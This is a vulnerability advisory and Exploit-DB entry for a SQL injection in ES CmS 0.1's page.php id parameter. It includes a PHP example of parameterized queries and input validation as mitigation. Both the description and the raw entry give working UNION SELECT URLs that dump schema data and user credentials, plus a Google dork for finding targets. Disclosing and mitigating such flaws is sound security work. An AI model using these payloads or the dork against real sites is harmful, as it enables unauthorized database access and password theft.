Vendor: ES CmS 0.1
By: MR.XpR
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: ES CmS 0.1
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: N/A
Related CWE: N/A
CPE: escms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: BT, 7
Date: 2012

ES CmS 0.1 SQL Injection Vulnerability

ES CmS 0.1 is vulnerable to SQL injection through the id parameter of page.php. An attacker can exploit this by sending malicious SQL to the application in a crafted URL, for example http://localhost/page.php?id=[sqli]. An attacker can also use a UNION SELECT statement to retrieve data from the database. For example, http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod) and http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users can be used to retrieve data from the database.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious input from being accepted by the application.
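
One way to apply both mitigations to a page.php?id= style handler, as an added example (not ES CmS code and not part of the original advisory). The pages table, its columns, the function names and the sample inputs are assumptions constructed for the demo, which runs against an in-memory SQLite database through PDO.

```php
<?php
// Hypothetical handler for page.php?id=; table, rows and names are constructed for the demo.
declare(strict_types=1);

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $pdo->exec("INSERT INTO pages VALUES (1, 'Home', 'Welcome'), (2, 'About', 'About us')");
    return $pdo;
}

// Input validation: accept only a positive decimal integer, reject everything else.
function parse_page_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing value or array input such as id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Parameterized query: the id is bound as an integer and never concatenated into the SQL text.
function fetch_page(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function handle_request(PDO $pdo, array $query): array
{
    $id = parse_page_id($query['id'] ?? null);
    if ($id === null) {
        return ['status' => 400, 'body' => 'Invalid page id'];
    }
    $page = fetch_page($pdo, $id);
    return $page === null ? ['status' => 404, 'body' => 'Page not found']
                          : ['status' => 200, 'body' => $page['title']];
}

$pdo = open_demo_db();
foreach (['1', '99', '-1 union select 1,2,3', '2 OR 1=1', ''] as $sample) { // constructed inputs
    printf("%-26s => %d\n", var_export($sample, true), handle_request($pdo, ['id' => $sample])['status']);
}
```

Validation rejects non-numeric input before any query runs, and the bound parameter keeps the query structure fixed even if validation were bypassed or relaxed later.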
Source

Exploit-DB raw data:

# Exploit Title: ES CmS 0.1 Sql Injection Vulnerability

# Google Dork: inurl:/page.php?id=

# Date: 2012

# Exploit Author: MR.XpR

# Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escms_alpha_v0_1.zip

# Version: v.0.1

# Tested on: BT , 7


# Poc :

http://localhost/page.php?id=[sqli]


# D3mo : 

http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)

http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users


# TNx To : 

My Brothers Siamak.Black(Black.Boy) , UnknowN

 everything is not true ,The real is dream